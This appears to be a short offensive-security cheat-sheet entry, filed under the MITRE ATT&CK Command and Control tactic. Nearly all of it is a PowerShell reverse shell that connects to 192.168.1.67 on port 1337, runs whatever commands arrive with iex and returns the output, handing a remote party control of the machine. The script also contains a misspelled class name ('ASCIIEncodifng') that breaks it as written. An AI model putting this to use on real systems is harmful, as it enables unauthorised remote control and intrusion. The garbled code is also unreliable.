Command and Control

The adversary is trying to communicate with compromised systems to control them. https://attack.mitre.org/tactics/TA0011/

PowerShell Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient('192.168.1.67', 1337);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
	$data = (New-Object -TypeName System.Text.ASCIIEncodifng).GetString($bytes, 0, $i);
	$sendback = (iex $data 2>&1 | Out-String);
	$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
	$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
	$stream.Write($sendbyte, 0, $sendbyte.Length);
	$stream.Flush();
}
$client.Close();